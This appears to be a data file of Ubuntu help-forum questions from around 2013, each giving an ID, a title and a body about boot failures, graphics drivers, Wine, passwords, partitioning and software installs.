281035	laptop blocking other computers on home wifi routers	my laptop seems to be blocking other computers when connected to home dsl/cable routers via wifi . the problem is reproduced at several locations with the same laptop : other users complain that they are not able to connect to the wifi router anymore , and when connected , they experience extremely slow traffic . on my own laptop , everything seems to be fine , apart from occasional disconnections followed by difficult re-connections to the router . the laptop is an hp pavilion dm4 with ubuntu 12.04 . the wifi adapter is handled by cfg80211 . this is extremely annoying , and i can not find any reports of similar problems on the internet . by any chance , could my problem be related to this ? http : //intel.com/support/wireless/wlan/sb/cs-006205.htm
281036	dell inspiron 15z problems booting ubuntu in uefi mode	after several tries i managed to install ubuntu 12.04 in efi mode ( gpt partition table ) on my dell inspiron 15z . what worked for me is what is in this post http : //askubuntu.com/a/224332/149034 , i.e . i set the bios in legacy mode and then choose to boot ( f12 at stuart-up ) the 12.04 live cd in efi mode . in this way i get ubuntu installed in a gpt partition table , with efi boot loader . the problem is that now , to start ubuntu , i have to repeat these steps everytime : the boot is set in legacy mode from bios . i press f12 at start-up to choose to boot ubuntu in uefi mode . if i set uefi mode directly in bios , after grub , i get a blank ( purple ) screen , and ubuntu does not start . secure boot is disabled , and i tried fixing it with boot-repair but did not succeed . does anyone have a clue of what is the problem ? i discovered this is related to a bug https : //bugs.launchpad.net/ubuntu/+source/grub2/+bug/1093472 https : //answers.launchpad.net/ubuntu-certification/+question/217551 ubuntu 12.10 boot hangs at purple screen when integrated nic ( ethernet card ) is enabled in bios it turns out that deactivating integrated nit in bios the uefi boots starts directly . but wirh no ethernet ... .
281037	virtual terminal ( ctrl+alt+ ( fx ) does n't work	i 'm trying to get to any virtual terminal by pressing ctrl+alt+f4 ( for example ) but the only thing i get is a black screen with the underscore blinking in the upper-left corner . the only thing i can do at this point is manually reboot the computer . was n't there supposed to be a terminal ? what 's happening ?
281038	i reset password in the recovery mode , but still unable to login in ubuntu	i booted in recovery mode and then typed : mount -o rw , remount / passwd username i got numerous options , none of them worked . then i type passwd and hit enter . it asked for new password , i reset the password and exited the root system then tried to login , but it said the password is incorrect .
281039	on shutdown , computer reboots when started via wake on lan	here 's the situation : i start my main computer from another pc via wake on lan `` wakeonlan `` . all works fine . when i 'm done doing what i did , i run `` sudo shutdown -h now '' ( in the ssh terminal in which i was working ) to shutdown the computer . but instead of shutting down , it reboots . i then have to reconnect to it via ssh and run the shutdown command again , and then it shuts down and stays off . i can then start it again via wake on lan ... does anyone know , why my computer actually reboots when i type `` sudo shutdown -h now '' when started via wake on lan ? some information about the computer : ubuntu 13.04 moterboard : gigabyte ga-z77x-ud3h ethernet controller ( as reported by `` lspci '' ) : qualcomm atheros ar8151 v2.0 gigabit ethernet ( rev c0 )
281043	ubuntu does n't start after i installed updates	when i install ubuntu , i set it so . then asks to restart , i restart the pc , it comes standard in ubuntu . after i install updates it asks to restart again , i restart the pc again , more so that he did not re-enter the ubuntu , it gets a black screen ... why ?
281044	how to get 'autotap ' working on ubuntu ?	i 've been trying to get autotap for windows v.3.1 working with ubuntu 12.04 and wine . it seems to install ok , but when i start autotap it tells me that there are no usb ports available . there is 1 of 4 that i have available and want to plug the interface into . i have tried starting it with and without the interface plugged in . it wo n't see it , or any free ports to utilize . any idea how i can make it see that usb port ? for now , i keep one laptop loaded windows vista home premium for the purpose . i know i could try different diagnostic scanners , but i 'd rather keep the one i have and not spend any more money . http : //autotap.com/windowssoftware2.asp
281045	will my data be safe if my laptop is stolen when there is fde and auto-login ?	my ssd supports full disk encryption ( fde ) . i have enabled fde and set a password in bios . in case my laptop is stolen or lost , i want nobody to be able to get my data . is it now secure to allow auto-login within ubuntu ? basically i just do n't want to enter 2 passwords when booting , just one .
281053	upgrading does n't work on my laptop for 12.04 ?	i 'm not able to upgrade to 12.04 . i have tried update manager but i get no new version . i 've tried terminal it also says no new version .
281056	how to get the grub boot menu in a encrypted single-boot ubuntu system ?	some time ago i installed ubuntu 12.04.2 from the alternate cd , and choose the option of full-disk encryption . now i tried to install the proprietary fglrx driver , but the system lost power halfway in the process , and now the system hangs with a purple screen after i give my pass-phrase . i 'm trying to boot from a older kernel , but ca n't get the grub menu to show up pressing shift as recommended in the answers to a similar question . as my system is encrypted , i think it may have something to do with it . do i need to press shift after or before typing the pass-phrase ? i tried both ways and none worked .
281057	how to backup program data , such as chromium and thunderbird etc ?	what do you recommend to backup , if you do n't trust your linux system ( i have the problem that sometimes i ca n't boot linux because of graphic-card issues ) . at the moment i 'm using back in time and backup / . i think this is a complete backup of my system right now ?
281060	screen flickers with nvidia gpu	when i install the nvidia driver ( have tried both current and post-release current ) the monitor flickers every time i open a new window/program such as firefox . i do n't know what else i 'm going to do ? please help because with this flickering i am afraid that my monitor is going to stop sometime .
281062	how to get nautilus-scripts working on ubuntu 13.04 ?	how to get nautilus-scripts ( terminal here , root nautilus , root gedit ) working on ubuntu 13.04 ? i copied those scripts to .gnome2/nautilus-scripts folder but it dose not seem to work on ubuntu 13.04 . it worked in 12.10 .
281065	cant open gnome-control-center ?	when i click on system settings in the dash nothing happens . when i run the command gnome-control-center i get the following output . gnome-control-center : error while loading shared libraries : libgnome-control-center.so.1 : can not open shared object file : no such file or directory`
281069	cinnamon settings will not open on 12.04 ( cinnamon 1.6.7 stable )	have cinnamon 1.6.7 ( stable ) for ubuntu 12.04 precise installed . can not open the cinnamon settings panel . i have tried both stable & nightly same thing . have changed 1 item in /usr/share/cinnamon/js/ui/layout.js from this page ( look in comment section ) . i can change it back if needed . want to able to disable hot corners but can not change since i ca n't get into cinnamon settings panel . any help would be appreciated ? dell latitiude d600 2gb ram 32 mb of video ram also on this laptop is a non-pae kernel .
281074	can i set my user account to have no password ?	if i attempt to change my password to nothing by opening `` user accounts '' , the `` change '' button remains greyed out : how do i change my password to be empty ? i know you can set ubuntu to automatically log you in , but i want my password to be empty , i never want to type in a password to authenticate myself as that user . i know that there are reasons why this might not be a good idea , but i want to know if it is even possible . i 'm using ubuntu 12.10 .
281079	what is the vesa : wrestler driver and why am i using it ?	i just installed the proprietary fglrx-updates driver : however , when i check the graphics , it 's shown to be vesa : wrestler : what is this vesa : wrestler driver and why am i using it ? is it just another name for the fglrx-updates driver ? or is it a different thing ?
281092	why is canonical choosing qt over gtk for unity 's next generation ?	so much has been written that i 'm kinf of confused , but if i 'm not mistaken canonical is building the next generation of unity for mobile devices with qt , and in the near future the desktop will also be migrated to qt . i just wanted to know the technical and/or political reasons driving this decision , and what consequences could it mean for the currently existing unbutu desktop applications .
281095	install ubuntu 12.04 alongside windows 8 ( not preinstalled ) without grub	i want to install x64 ubuntu 12.04.2 on my hp laptop . i do n't like grub , so i want to install without it or install grub onto another partition and then add grub to windows ' bootloader ( and set grub timeout to 0 ) . is that possible and if yes , how can that be done ? thank you !
281104	missing top/bottom panel in gnome on ubuntu 12.04	i am using ubuntu 12.03 and the system recently installed some updates . then i logged back in , the top and bottom panels ( system , time , etc ) were missing from gnome . i thought it might be an issue with the graphics drivers so i updated my nvidia drivers to no effect using the following commands : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current when i take a screenshot , the panels appear in a duplicated screen to the right that i can not see on my screen . ctrl+alt+left/right do not change the workspace .
281105	pulseaudio high cpu load and sound gets interrupted	serious sound problems starting occuring about last week , with no particular reason . the problem is that all programs that send sound to pulseaudio , at some point stop playing sound , they continue for a few seconds and then the playback is interrupted . vlc gave an error that source was disconnected . skype halts . then i realized that pulseaudio in keeping one of the two cpus busy with 80 % load . i am using ubuntu 12.10 fully updated , 32bit , on a samsung q45 with an intel sound card i would appreciate any idea about what is wrong or instructions on how the error can be further traced
281109	standard place to put development/code files in ubuntu	i am setting up my development environment on ubuntu and i was wondering what the standard is on where i should place custom development projects on the file system ? thanks !
281111	how shall i partition my disk	i installed ubuntu 64bit on a new dell xps 8500 . as i had no idea how to partition my disk , i installed everything in one partition . the disk has 2tb and there is an additional 64gb ssd inside , which ubuntu does not use as far as i can see . how can i improve my installation ? how shall i partition the disk ? how can i use the ssd ? as i boot with uefi , shall i put the efi-partition on the ssd ?
281115	can i install ubuntu in my trial version of windows 7 ?	i have installed trial version of windows 7 home premium oem . which is going to inactivate in next 20 days . so can i install ubuntu in my sonay vaio sve 1511 aen model ? if yes than how to instal ? and if after 20 days windows is not activated than do i able to use ubuntu or not ?
281116	ubuntu 12.10 unity not starting after 11/04 update	after this thursday updates when i login to my account unity wont start anymore . i have a pic of the how the system starts : http : //img841.imageshack.us/img841/2822/screenshotfrom201304131.png and here the updates made : http : //img547.imageshack.us/img547/2822/screenshotfrom201304131.png
281119	how do you run update-grub ?	i went into live cd and activated terminal . then , i typed gksu nautilus to gain temporary access to my root directory . once the manager window opened , i clicked on file system and navigated to the /etc/default/grub directory . i then double clicked on the grub file to make changes to the timeout and timeout_quiet . i saved the file after i made the changes . then i went back to the terminal mode and typed : gksu update-grub the error message i got was : can not find a device for / ( is /dev mounted ? ) i 'm not sure what to do at this point . how can i run update-grub to update the changes ? thanks in advance for your help . please be very detailed and specific with your response as i am totally new to this environment .
281124	when will chrome support webgl on linux ?	any official statements on the matter ? a release schedule ?
281130	how do i partition my hard drive to manually install ubuntu 12.10 alongside windows 8 ?	i have a windows 7 machine i upgraded to windows 8 , so as a result i have bios and not uefi . i attempted to install ubuntu 12.10 alongside windows 8 yesterday , and accidentally used wubi without understanding it had massive errors . after completely formatting my hard drive and re-installing windows 8 , i want to attempt installing ubuntu 12.10 again . i made the bootable usb again , but when i went to install ubuntu , i did n't get the option to install ubuntu alongside windows 8 . as a result , i have tried making a bootable usb for ubuntu 13.10 , ubuntu 12.04 lts , and even ubuntu 11.10 but none of them gave me the option of installing ubuntu alongside windows 8 . in order to rectify this issue , i figured i must partition my drive myself and continue with the 'something else ' installing option of ubuntu 12.10 . would it be better to partition my drive in windows or the bootable ubuntu usb ? second , is the fact that windows 8 is n't recognised by ubuntu indicative of some errors with the hard drive or my computer that i should fix before i attempt to do something manually ?
281134	can i run a python script in ubuntu 12.04 's from the graphical interface	i 'm trying to figure out how to select and run a python file through the ubuntu windows system . i 've never run scripts in my life and i 'm very new to this.. so i went to youtube cause i felt like this should n't have been hard but ... using the script ( and instructions ) described here : create , save and run python program via ubuntu terminal print '' hello world '' vary = raw_input ( `` enter your name '' ) print ( `` hey '' + vary ) i tried to open the the file by double clicking it ( again and again ) ... and it failed , would not ask for my input , just opened the terminal and disappeared ( closed the shell ) and that 's all.. but idle was able to run it perfectly so i know it 's not the script . when i used vim to create it as a file and run it from there , i got this output : traceback ( most recent call last ) : file `` shiite/livescript/rev.py '' , line 2 , in < module > vary = input ( `` enter your name bitch : `` ) file `` < string > '' , line 1 , in < module > nameerror : name 'dave ' is not defined one more thing , i 've also tried selecting the properties of the file with right click and checked the box that let 's it execute.. still nothing.. anyone know why the ubuntu terminal wo n't run python programs ? ? ? maybe there 's a terminal that will run something like this ? ? ?
281139	screen tearing without compiz	i am trying to setup a working 13.04 desktop . if i use default ubuntu desktop , it loads compiz and i do n't have any tearing . if i run openbox , i get tearing while compiz is disabled . ive tried to add this in /etc/enviornment : clutter_paint=disable-clipped-redraws : disable-culling but it did n't work . also tried compton as a composite manager for openbox but also did n't have any luck . in xorg.conf i have triplebuffer set to on . would like to use openbox , i3wm , mate , xfce ... everything except the default unity desktop . any help , please ?
281143	ubuntu 12.10 will not shutdown/reboot . how could i solve this ?	ubuntu 12.10 will not shutdown or restart , even by using terminal commands such as : sudo shutdown -r now , init 0 , halt , etc . i have noticed one thing , that whenever i reinstall nvidia drivers , the system can shutdown/reboot temporarily , but after one or two shutdowns/reboots , the problem happens again . i 'm not sure exactly when this problem started , but it was sometime after tuesday or wednesday april 10 , when i installed automatic updates . system : memory 3.9 gib processor intel core 2 duo cpu t7700 @ 2.40ghz x 2 graphics geforce 8600m gt/pcie/sse2 os type 64-bit disk 113.9 gb
281145	is it possible to download shared ( via ubuntuone ) mp3 files ?	when i 've tried to share audio files ( mp3 ) using the filelink in thunderbird , the recipients are only able to listen to the files but not download or otherwise save them . how can audio files be accessed for downloading through ubuntu one ?
281149	how can i use my phone or tablet as mousepad ?	i just set up my ubuntu desktop to use our living room tv as a monitor , and i would like to be able to use either my iphone or nexus 7 tablet as a mousepad/keyboard for controlling it from the couch . with mac/windows there were plenty of apps that did this , what do i need to do this using ubuntu ? and just to be clear i am not looking for a remote desktop on my phone/tablet , i want to use them as a mouse and keyboard . thanks !
281154	how to configure qjoypad ?	i followed the steps on this page but when i run make it gives me this error : /usr/bin/ld : keycode.o : undefined reference to symbol 'xkeycodetokeysym' /usr/bin/ld : note : 'xkeycodetokeysym ' is defined in dso /usr/lib/i386-linux-gnu/libx11.so.6 so try adding it to the linker command line /usr/lib/i386-linux-gnu/libx11.so.6 : could not read symbols : invalid operation collect2 : error : ld returned 1 exit status `
281155	can not get wubi to launch windows 7 64-bit	so here 's my problem : when i run wubi , it asks for admin rights so i hit `` yes . '' then , the mouse has the loading sign next to it and disappears , nothing happens . so here 's the log : 04-13 17:14 info root : === wubi 12.10 rev273 === 04-13 17:14 debug root : logfile is c : \users\roperson\appdata\local\temp\wubi-12.10-rev273.log 04-13 17:14 debug root : sys.argv = [ 'main.pyo ' , ' -- exefile= '' c : \\users\\roperson\\desktop\\wubi.exe '' ' ] 04-13 17:14 debug commonbackend : data_dir=c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\data 04-13 17:14 debug windowsbackend : 7z=c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\bin\7z.exe 04-13 17:14 debug windowsbackend : startup_folder=c : \programdata\microsoft\windows\start menu\programs\startup 04-13 17:14 debug commonbackend : fetching basic info ... 04-13 17:14 debug commonbackend : original_exe=c : \users\roperson\desktop\wubi.exe 04-13 17:14 debug commonbackend : platform=win32 04-13 17:14 debug commonbackend : osname=nt 04-13 17:14 debug commonbackend : language=en_us 04-13 17:14 debug commonbackend : encoding=cp1252 04-13 17:14 debug windowsbackend : arch=amd64 04-13 17:14 debug commonbackend : parsing isolist=c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\data\isolist.ini 04-13 17:14 debug commonbackend : adding distro edubuntu-i386 04-13 17:14 debug commonbackend : adding distro kubuntu-amd64 04-13 17:14 debug commonbackend : adding distro mythbuntu-i386 04-13 17:14 debug commonbackend : adding distro edubuntu-amd64 04-13 17:14 debug commonbackend : adding distro ubuntu-amd64 04-13 17:14 debug commonbackend : adding distro lubuntu-i386 04-13 17:14 debug commonbackend : adding distro ubuntu-i386 04-13 17:14 debug commonbackend : adding distro mythbuntu-amd64 04-13 17:14 debug commonbackend : adding distro kubuntu-i386 04-13 17:14 debug commonbackend : adding distro lubuntu-amd64 04-13 17:14 debug windowsbackend : fetching host info ... 04-13 17:14 debug windowsbackend : registry_key=software\microsoft\windows\currentversion\uninstall\wubi 04-13 17:14 debug windowsbackend : windows version=vista 04-13 17:14 debug windowsbackend : windows_version2=windows 7 enterprise 04-13 17:14 debug windowsbackend : windows_sp=none 04-13 17:14 debug windowsbackend : windows_build=7601 04-13 17:14 debug windowsbackend : gmt=-5 04-13 17:14 debug windowsbackend : country=us 04-13 17:14 debug windowsbackend : timezone=america/new_york 04-13 17:14 debug windowsbackend : windows_username=roperson 04-13 17:14 debug windowsbackend : user_full_name=roperson 04-13 17:14 debug windowsbackend : user_directory=c : \users\roperson 04-13 17:14 debug windowsbackend : windows_language_code=1033 04-13 17:14 debug windowsbackend : windows_language=english 04-13 17:14 debug windowsbackend : processor_name=amd phenom ( tm ) ii x2 560 processor 04-13 17:14 debug windowsbackend : bootloader=vista 04-13 17:14 debug windowsbackend : system_drive=drive ( c : hd 205574.089844 mb free ntfs ) 04-13 17:14 debug windowsbackend : drive=drive ( c : hd 205574.089844 mb free ntfs ) 04-13 17:14 debug windowsbackend : drive=drive ( d : cd 4338.66601563 mb free udf ) 04-13 17:14 debug windowsbackend : uninstaller_path=c : \ubuntu\uninstall-wubi.exe 04-13 17:14 debug windowsbackend : previous_target_dir=c : \ubuntu 04-13 17:14 debug windowsbackend : previous_distro_name=ubuntu 04-13 17:14 debug windowsbackend : keyboard_id=67699721 04-13 17:14 debug windowsbackend : keyboard_layout=us 04-13 17:14 debug windowsbackend : keyboard_variant= 04-13 17:14 debug commonbackend : python locale= ( 'en_us ' , 'cp1252 ' ) 04-13 17:14 debug commonbackend : locale=en_us.utf-8 04-13 17:14 debug windowsbackend : total_memory_mb=3580.53515625 04-13 17:14 debug commonbackend : searching isos on usb devices 04-13 17:14 debug commonbackend : searching for local cds 04-13 17:14 debug distro : checking whether c : \users\roperson\appdata\local\temp\pyl6eaa.tmp is a valid ubuntu cd 04-13 17:14 debug distro : does not contain c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether c : \users\roperson\appdata\local\temp\pyl6eaa.tmp is a valid ubuntu cd 04-13 17:14 debug distro : does not contain c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether c : \users\roperson\appdata\local\temp\pyl6eaa.tmp is a valid kubuntu cd 04-13 17:14 debug distro : does not contain c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether c : \users\roperson\appdata\local\temp\pyl6eaa.tmp is a valid kubuntu cd 04-13 17:14 debug distro : does not contain c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether c : \users\roperson\appdata\local\temp\pyl6eaa.tmp is a valid mythbuntu cd 04-13 17:14 debug distro : does not contain c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether c : \users\roperson\appdata\local\temp\pyl6eaa.tmp is a valid mythbuntu cd 04-13 17:14 debug distro : does not contain c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether c : \users\roperson\appdata\local\temp\pyl6eaa.tmp is a valid edubuntu cd 04-13 17:14 debug distro : does not contain c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether c : \users\roperson\appdata\local\temp\pyl6eaa.tmp is a valid edubuntu cd 04-13 17:14 debug distro : does not contain c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether c : \users\roperson\appdata\local\temp\pyl6eaa.tmp is a valid lubuntu cd 04-13 17:14 debug distro : does not contain c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether c : \users\roperson\appdata\local\temp\pyl6eaa.tmp is a valid lubuntu cd 04-13 17:14 debug distro : does not contain c : \users\roperson\appdata\local\temp\pyl6eaa.tmp\casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether d : \ is a valid ubuntu cd 04-13 17:14 debug distro : does not contain d : \casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether d : \ is a valid ubuntu cd 04-13 17:14 debug distro : does not contain d : \casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether d : \ is a valid kubuntu cd 04-13 17:14 debug distro : does not contain d : \casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether d : \ is a valid kubuntu cd 04-13 17:14 debug distro : does not contain d : \casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether d : \ is a valid mythbuntu cd 04-13 17:14 debug distro : does not contain d : \casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether d : \ is a valid mythbuntu cd 04-13 17:14 debug distro : does not contain d : \casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether d : \ is a valid edubuntu cd 04-13 17:14 debug distro : does not contain d : \casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether d : \ is a valid edubuntu cd 04-13 17:14 debug distro : does not contain d : \casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether d : \ is a valid lubuntu cd 04-13 17:14 debug distro : does not contain d : \casper\filesystem.squashfs 04-13 17:14 debug distro : checking whether d : \ is a valid lubuntu cd 04-13 17:14 debug distro : does not contain d : \casper\filesystem.squashfs 04-13 17:14 info root : already installed , running the uninstaller ... 04-13 17:14 info root : running the uninstaller ... 04-13 17:14 info commonbackend : launching previous uninestaller c : \ubuntu\uninstall-wubi.exe 04-13 17:14 error root : [ errno 193 ] % 1 is not a valid win32 application traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 145 , in run_installer file `` \lib\wubi\application.py '' , line 175 , in run_uninstaller file `` \lib\wubi\backends\common\backend.py '' , line 874 , in run_previous_uninstaller file `` \lib\subprocess.py '' , line 425 , in call file `` \lib\subprocess.py '' , line 547 , in __init__ file `` \lib\subprocess.py '' , line 701 , in _execute_child windowserror : [ errno 193 ] % 1 is not a valid win32 application can anyone help me understand what 's going on ?
281156	prevent automatic updates on certain wifi networks	i have a 200 mb / month plan on my cell phone and automatic updates on my ubuntu machine . that works just fine , unless i tether them together . a couple days ago , something , i presume automatic updates , used all of it , leaving me nothing for the rest of the month . is there a possibility to prevent automatic updates on certain wifi networks ? related is it possible to disable the automatic download of updates when the internet connection is through a 3g dongle ?
281160	running age of empires 2 in linux	i 've been recently trying to play age of empires 2 on my linux ubuntu 12.04 lts computer . however , i ca n't seem to get it to work with any method i found on the computer . i 've tried playonlinux , however , when i try to play it , a message comes up saying that there has been an internal error . i 've also tried doing it though virtualbox and installing it onto a virtual version of windows xp . however , after it completes the install , it tell me that there is no cd in the disk drive and that i should insert it and restart the application . if anyone has a way i have n't tried yet or something that i could have missed please let me know . thanks .
281165	i am not in `` sudoers '' even though i am only user	using ubuntu 12.04 the only thing i have done recently is add my name to `` dialout '' to enable communication to an arduino board vis usb . after that my user name and password are no longer recognized for sudo operations . i am the only user and i always booted without need of password . i need to correct this situation . i tried rebooting in safe mode but that did not correct the problem . the safe boot wanted to download 160 mb to which i declined until i am again a sudoer . the user accounts lists me as `` standard '' even though i have done sudo ops before . solved : since i could not do any sudo ops because i was locked out i used this link to add myself back into the sudo group ; how do i add myself back as a sudo user ?
281168	how i can install emerald on 12.10 ?	how i can install emerald on ubuntu 12.10 ?
281172	wallch does n't work	i 've installed wallch from both the apt , and the source from sourceforge , and both not working . simply adding an image to the queue and setting it as the background works , but both `` live earth '' and `` picture of the day '' features , wo n't work at all . any thoughts on why this can happen ? i 'm using ubuntu 12.10 and wallch 3.0
281176	enable transparency in gnome activities overview	instead of having a tranparent background like this : ... my gnome activities overview is having a solid black background . how can i get the transparency ?
281177	colours/background messed up in vnc viewer	i 've set up vncserver on my new build and i can connect using realvnc vnc viewer , however the colours are a bit off and it looks kind of awful . see this screenshot : what can i do to put this right ? i 've been using depth 24 when creating the vnc session , but as far as i can see no other depths make a difference . is it something else ?
281184	how to set password for administrator account created without password ?	i 've recently upgraded to ubuntu 12.04 and so far i did n't have problems with it . until i decided to make a stupid mistake of messing with the compiz settings and making the gui disappear . i made some research and i managed to get it working again , but i felt like it was still partially broken , and unity became slower than before . i did n't bother with this anymore , found out the compiz/gtk/unity settings are separated for each user , so i logged in as guest , deleted my main account and created a new one . there 's one problem though . when i created the new administrator account , it did n't ask me for a password , but when i tried to log in , it asks for a password and now i have no idea on how to set/change the password for this account , since i can only login as guest without superuser/root access . i use this pc for development , although i 'm a total noob with linux . i would appreciate if someone knows a way to change the password rather than having to reinstall 12.04 from scratch .
281185	some doubt about root password	i was looking for installing a lamp in my personal pc but i ca n't create folders in /var/www so i run this little script in my console : sudo passwd -l root and i do n't know if this an issue security in my system . if is , what i 'll do to solve this ?
281186	guide to installing ubuntu onto a system with windows 8 preinstalled	i 'm interested in installing ubuntu onto my asus laptop which is running windows 8 . i 'm a bit nervous . what if the installation goes wrong ? i want ubuntu to be my default operating system . if it messes up will i be able to go back to windows 8 ?
281192	emacs 24.3 wo n't lock to unity bar	i 'm running a ubuntu 12.04 . i just installed emacs 24.3 from damian 's cassou 's emacs ppa . before i doing this , i completely removed all emacs with the following command : sudo apt-get remove emacs* not sure if this was a good or bad thing . next i opened emacs and i locked it to the unity bar . however , whenever i open a new script another emacs `` thumbnail '' appears on the unity bar . how do i get emacs to stay locked on the ubuntu unity bar ?
281194	how to solve 'error : invalid efi path ' while trying to boot windows 7 ?	here is the output of boot-repair : http : //paste.ubuntu.com/5706404/ the grub keeps telling me this while i try to boot into windows : error : invalid efi path i can boot into ubuntu without problems .
281195	how to view twitter with empathy ?	so pidgin would have been fine except it crashes after like 1 minute of opening with the error : segmentation fault ( core dumped ) also some dbus error that i ca n't recreate now . and empathy is stable but i ca n't seem to get twitter working with it . can anyone provide instruction on how to setup empathy with twitter ? tia my current system is xubuntu 12.04 powerpc i 'd like to not have to upgrade to raring in order to get this working . i tried installing the quantal pidgin package but that was a no go either .
281199	none of my games are working in wine 1.5	i have been trying to download and play world of warcraft , and play stronghold ( disk game ) but neither are working . my wine is version 1.5.28 . i have seen on winehq 's appdb that both work for others , so i ask , what would i need to do to get them both to work ?
281200	ca n't boot ubuntu after installing it and it looks like it is n't even installed in the disc management	i installed ubuntu 12.10 on a 45gb partition , and when it asked me to reboot the computer , the dual boot menu did n't appear , it boot directly windows 7 . when i checked the disc management , there was the partition where i installed ubuntu with 23gb total & 100 % free , and two other new partitions without any names , one is 20gb and 100 % free and the other is 2gb and 100 % free , it looks like ubuntu is n't even installed . i read about grub in some other similar problems but i did n't understood what 's that , i 've never used a ubuntu or a linux before , this is my first time .
281211	make slingshot-launcher run in fullscreen mode on xubuntu	here 's what i got cooking on xubuntu 12.04 slingshot launcher for precise elementary-daily ppa but it runs in a mini mode on the upper left of the screen . installing gala or mutter did not get it running full screen ? being able to run it fullscreen like in previous versions or being able to change the position of the window and arrow would be an answer to this question .
281212	linux ubuntu 12.04 - teamviewer 8 - microphone/speakers problem	i already install teamviewer 8 on my laptop ( linux ubuntu 12.04 ) but there is no sound - no microphone or speakers can be detected from teamviewer . is there any way that i can fix that problem ? do you have any idea ?
281217	added new user no shell/ tab completing	i added a new ubuntu user with this command useradd -d /home/newname -m newname it seems no tab completing feature and only $ as prompt , when i logged in as root i see root @ server $ as prompt . something is missing for my new user ? thanks
281220	`` mountall : event failed '' on startup	i have shrunk my root partition ( /dev/sda1 ) and expanded my home partition ( /dev/sda2 ) using the free space gained from the root partition . then , every time i boot my machine i get this error , `` mountall : event failed . '' but , everything seems to run well . all partitions get mounted . i do not think it comes from the swap partition for i have many times repartitioned it and no such error was showed .
281227	netflix sliverlight update	so i found away to install netflix on my ubuntu 12.10 os a while back but now it requires a higher version of silverlight and i tried moonlight and reinstalling it the same way but it doest seem to work anyone have this problem and know how to fix it ? ( this is the way i installed it http : //www.techrepublic.com/blog/opensource/how-to-get-netflix-streaming-on-ubuntu-1210/4019 )
281228	netbeans installer stopped , ca n't install or uninstall	netbeans 7.3 install was interrupted , i do n't have /usr/local/netbeans , i ca n't find the app or uninstall files . installing again says component has been installed .
281229	how to add daily events via command-line ?	is there any way to add the our events from he terminal ? i know the gui way but i want to do it from the terminal .
281233	how can i install the electrum bitcoin wallet ?	i would like to install the electrum bitcoin wallet on ubuntu 12.10 . the linux instructions are located at http : //electrum.org/download.html and say : install python-qt4 and pip : sudo apt-get install python-qt4 python-pip install electrum : sudo pip install http : //download.electrum.org/download/electrum-1.7.3.tar.gz # md5=22a35b0816f7c6c59fbeddb50e832ada run : electrum it seems the python interpreter is already included with ubuntu . if i open a terminal and put in sudo pip install http : //download.electrum.org/download/electrum-1.7.3.tar.gz it says sudo : pip : command not found so how do i install python pip or are there any other ways to install electrum ? thank you . steve update : i managed to install python-pip from this link ( using method # 2 . i could not find `` easy_install '' from method # 1 ) . . . http : //filon.us/slava/ ? p=189 after that i could install electrum . great so far ! ! but , i presume that because i 'm using the `` try out '' ( not the `` install '' ) version of ubuntu from a dvd-r , then if i reboot the computer i would have to go through the same long-winded procedure again to install python-pip and then electrum . so , is there any way of adding electrum ( and presumably python-pip ) to the ubuntu dvd-r so i can carry the dvd-r anywhere and use any pc to run electrum ? steve
281235	desperately in need of help	so i made a huge mistake and i am in desperate need of help . i had installed ubuntu 12.04 along side windows 7 . i was planning on switching over so i figured i would copy over all my pictures , music , and other files to my new ubuntu partition and then delete windows . i had figured ubuntu created a separate partition on my hard drive which had nothing to do with windows so i went ahead and deleted the windows partitions . i did n't realize this would destroy my ubuntu installation as well . when i go to install windows again with the disc i can see the partition that was created for ubuntu , but all it shows is free space . i ca n't even see the installation with a ubuntu live cd . is there anyway to repair this or did i just completely screw myself ? any help would be appreciated .
281238	how to install color themes onto emacs 24.3 ?	i 'm trying to install the oblivion color theme into gnu emacs 24.3 . i downloaded the repository as a .zip file then moved the zip folder into my ~/.emacs.d/color-theme/themes directory . i 'm pretty sure this is my load path . when i open emacs and do m-x and type load-file `` ~/.emacs.d/color-theme/themes/oblivion-theme.el '' , it complains [ no match ] . even when i type load-file `` ~.ema and try to use the space-bar autocompletion , it still complains [ no match ] . i think it 's not recognizing this load path ? finally when i use the command to add a single directory to the load-path : m-x add-to-list 'load-path `` ~/.emacs.d/color-theme/themes '' it says [ no match ] . how do i fix this ?
281247	how to persistently maintain cloned mac address on network manager ?	i 'm on gnome 3 , and it seems like i 'm able to add cloned mac address to my network interfaces from the gui wizard of network manager . the catch is , every time i reboot my computer the cloned mac address of specific devices that i had set earlier are no longer there . therefore i have to resort to re-entering those details manually again and again , every time i reboot my computer . is there any 'simple ' automated script or command-line solution to this problem ?
